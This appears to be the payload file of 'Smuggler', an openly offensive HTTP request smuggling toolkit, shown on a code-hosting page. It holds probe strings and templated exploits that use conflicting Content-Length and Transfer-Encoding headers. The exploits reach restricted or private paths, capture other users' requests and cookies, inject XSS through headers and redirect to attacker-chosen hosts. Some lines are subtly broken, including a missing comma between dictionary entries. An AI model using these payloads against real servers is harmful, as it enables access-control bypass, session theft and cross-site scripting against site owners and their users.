Home Explore Help
Sign In
epsylon
/
Smuggler
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Tree: d4ed04517c
Branches Tags
Smuggler
/
payloads
/
payloads.py

payloads.py 8.3 KB
History Raw

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152 
  1. #!/usr/bin/env python3 
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. """
    4. 

  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
    5. 

  5. 

  6. You should have received a copy of the GNU General Public License along
    7. 

  7. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
    8. 

  8. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    9. 

  9. """
    10. 

  10. payloads={
    11. 

  11. 	'CL-CL-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 6\r\nContent-Length: 7\n\n3\nabc\nQ',
    12. 

  12. 	'CL-CL-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 6\r\nContent-Length: 7\n\n0\n\nX',
    13. 

  13. 	'TE-TE-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n3\nabc\nQ',
    14. 

  14. 	'TE-TE-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nX',
    15. 

  15. 	'TE-CL-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nContent-Length: 6\n\n3\nabc\nQ',
    16. 

  16. 	'TE-CL-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\nContent-Length: 5\n\nX\n\n0\n\nX',
    17. 

  17. 	'CL-TE-0#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\n\n3\nabc\nQ',
    18. 

  18. 	'CL-TE-1#Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\n\n0\n\nX'
    19. 

  19. 	 }
    20. 

  20. 

  21. exploits={
    22. 

  22. 	'EXPLOIT-0#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1\r\nContent-Length: $CL\n\np=$files',
    23. 

  23. 	'EXPLOIT-1_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
    24. 

  24. 	'EXPLOIT-1_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
    25. 

  25. 	'EXPLOIT-1_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
    26. 

  26. 	'EXPLOIT-1_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $restricted_path HTTP/1.1\r\nHost: $target\r\nFoo: x',
    27. 

  27. 	'EXPLOIT-2_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter=',
    28. 

  28. 	'EXPLOIT-2_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter=',
    29. 

  29. 	'EXPLOIT-2_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter=',
    30. 

  30. 	'EXPLOIT-2_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 100\n\n$parameter='
    31. 

  31. 	'EXPLOIT-3_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
    32. 

  32. 	'EXPLOIT-3_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
    33. 

  33. 	'EXPLOIT-3_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
    34. 

  34. 	'EXPLOIT-3_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nPOST $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 400\r\nCookie: $cookie\n\n$parameters',
    35. 

  35. 	'EXPLOIT-4_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
    36. 

  36. 	'EXPLOIT-4_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
    37. 

  37. 	'EXPLOIT-4_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
    38. 

  38. 	'EXPLOIT-4_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\n$method $path HTTP/1.1\r\n$header: $xss\r\nFoo: X',
    39. 

  39. 	'EXPLOIT-5_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    40. 

  40. 	'EXPLOIT-5_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    41. 

  41. 	'EXPLOIT-5_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    42. 

  42. 	'EXPLOIT-5_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    43. 

  43. 	'EXPLOIT-6_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    44. 

  44. 	'EXPLOIT-6_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    45. 

  45. 	'EXPLOIT-6_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    46. 

  46. 	'EXPLOIT-6_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $path HTTP/1.1\r\nHost: $location\r\nFoo: X',
    47. 

  47. 	'EXPLOIT-7_CL-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
    48. 

  48. 	'EXPLOIT-7_TE-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
    49. 

  49. 	'EXPLOIT-7_TE-TE#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
    50. 

  50. 	'EXPLOIT-7_CL-CL#$method $path HTTP/1.1\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: 7\n\n0\n\nGET $private HTTP/1.1\r\nFoo: X',
    51. 

  51.          }
    52. 

  52.